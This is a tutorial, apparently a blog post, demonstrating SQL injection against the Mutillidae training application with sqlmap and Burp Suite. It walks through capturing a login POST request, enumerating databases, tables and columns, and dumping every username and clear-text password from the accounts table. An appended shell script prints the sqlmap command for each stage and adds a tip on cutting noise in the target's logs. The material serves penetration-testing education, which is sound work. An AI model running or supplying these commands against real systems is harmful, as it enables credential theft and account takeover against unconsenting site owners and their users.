Hacking a MySQL database via SQLMAP
Here I will demonstrate a SQL injection attack using SQLMAP, and use it to bypass a login.
Tools: SQLMAP / Burp Suite
Browser: Iceweasel
Web App: Mutillidae v2.6.30
OS: Kali Linux
First:
- configure your browser to proxy through Burp Suite, then browse to
- http://192.168.0.9/mutillidae/index.php?page=login.php
- enter any data in the username and password fields and submit
- in Burp, review the captured POST request; we need the request path, the Host header and the body from it
Using the capture above we can now begin constructing our sqlmap command.
sqlmap --url="ENTER_FULL_URL_HERE" (this is the scheme, the Host header and the request path from the capture above, joined together)
sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php"
next part of the command
--data="ENTER_DATA_HERE" (this is the body of the POST request; the values you typed are only placeholders, sqlmap replaces them with its own payloads)
--data="username=admin&password=admcdicndsjcn&login-php-submit-button=Login"
and finally
--banner (retrieves the database banner, i.e. the DBMS version string)
the sqlmap command is now complete. Our full sqlmap command is:
sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php" --data="username=username&password=password&login-php-submit-button=Login" --banner
BYPASSING A LOGIN USING SQLMAP
Once sqlmap returns the MySQL banner we know the login form is injectable: only a successful injection makes the database answer a query we chose. Now we escalate. Rather than hand-crafting a bypass payload, we use the same injection point to enumerate the database and pull the credentials stored in it. We already have the base command for the attack:
sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php" --data="username=username&password=password&login-php-submit-button=Login"
we simply need to extend it. The first new switch we add is
--dbs (lists the available databases)
there were 6 databases listed
from experience I know that the database we need to attack is named nowasp, so we can now amend our sqlmap command:
remove --dbs (as we now know the name of the database we need to hack)
add
-D nowasp
and add
--tables (the tables switch lists all tables within the nowasp database)
again, experience tells me I want the info held within the accounts table
we can now further amend our command
remove
--tables
add
-T accounts
add
--columns (gives us the list of columns we can select info from)
Bingo, we now have the full list of columns; in this case I want
firstname
lastname
password
username
we are now ready to complete our sqlmap command and the hack, so we
remove
--columns
and add
-C firstname,lastname,password,username
and finally --dump, which pulls the contents of those columns out of the database and prints them (had the passwords been stored as hashes rather than in clear text, sqlmap would offer to crack them with its built-in dictionary attack at this point). Our full sqlmap injection command is:
sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php" --data="username=username&password=password&login-php-submit-button=Login" -D nowasp -T accounts -C firstname,lastname,password,username --dump
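The whole chain from Burp capture to --dump, as an added example that is not part of the original post: a POSIX shell script that parses a captured POST request into the --url and --data values and prints the sqlmap command for each stage of the walkthrough. The request text is constructed here to match the page's login capture (host, path and body are the page's values; the User-Agent and other headers are assumed filler). The -p, --dbms, --batch and -r switches are real sqlmap options the page does not use; nowasp, accounts and the column names are the page's own.

```shell
#!/bin/sh
# Added example (not from the original post): build the sqlmap commands used in
# this walkthrough from a Burp-captured POST request. Host, path and body are
# the page's own values; the remaining request headers are assumed filler.

REQUEST='POST /mutillidae/index.php?page=login.php HTTP/1.1
Host: 192.168.0.9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Iceweasel/31.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Connection: close

username=admin&password=admcdicndsjcn&login-php-submit-button=Login'

# Normalise line endings: raw HTTP as shown by Burp uses \r\n.
req_lines() { printf '%s\n' "$REQUEST" | tr -d '\r'; }

# Request line fields: METHOD PATH VERSION.
req_method() { req_lines | head -n 1 | cut -d' ' -f1; }
req_path()   { req_lines | head -n 1 | cut -d' ' -f2; }

# Host header value (header names are case-insensitive).
req_host() { req_lines | sed -n 's/^[Hh]ost: *//p' | head -n 1; }

# Everything after the first blank line is the body.
req_body() { req_lines | sed '1,/^$/d'; }

# sqlmap's --url is scheme + Host header + request path. The scheme is assumed
# to be http because that is what the page targets; use https for a TLS capture.
req_url() { printf 'http://%s%s\n' "$(req_host)" "$(req_path)"; }

# Parameter names in the body: sqlmap tests every one of these as an injection
# point unless -p narrows it down.
body_params() { req_body | tr '&' '\n' | cut -d= -f1 | tr '\n' ' ' | sed 's/ $//'; }

# sqlmap_cmd STAGE: the command for one step of the walkthrough. The parameter
# values in --data are placeholders; sqlmap substitutes its own payloads.
# --batch accepts sqlmap's default answer to every prompt, -p username tests
# only the parameter we care about, --dbms=mysql skips fingerprinting others.
sqlmap_cmd() {
  base="sqlmap --url=\"$(req_url)\" --data=\"$(req_body)\" -p username --dbms=mysql --batch"
  case "$1" in
    banner)  printf '%s --banner\n' "$base" ;;
    dbs)     printf '%s --dbs\n' "$base" ;;
    tables)  printf '%s -D nowasp --tables\n' "$base" ;;
    columns) printf '%s -D nowasp -T accounts --columns\n' "$base" ;;
    dump)    printf '%s -D nowasp -T accounts -C firstname,lastname,password,username --dump\n' "$base" ;;
    *)       echo "unknown stage: $1" >&2; return 1 ;;
  esac
}

# Shortcut: sqlmap can read the raw Burp request itself (-r FILE) instead of
# having --url and --data spelled out. Same request, fewer quoting mistakes.
# FILE is wherever you saved the capture (Burp: right-click, "Copy to file").
sqlmap_r_cmd() { printf 'sqlmap -r %s -p username --dbms=mysql --batch %s\n' "$1" "$2"; }

if [ "$(req_method)" != "POST" ]; then
  echo "expected a POST capture, got $(req_method)" >&2
  exit 1
fi

echo "parameters sqlmap would test without -p: $(body_params)"
for stage in banner dbs tables columns dump; do
  sqlmap_cmd "$stage"
done
echo "equivalent using the saved capture:"
sqlmap_r_cmd login.req --banner
```

Each printed line is the command for that stage of the walkthrough. Note that without -p sqlmap also probes login-php-submit-button, which wastes requests and adds noise in the target's logs; restricting to username is enough here because that is the field the page's injection lands in.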
we have successfully retrieved every username and password for the application, so we can log in as any of those users rather than needing to bypass the form at all.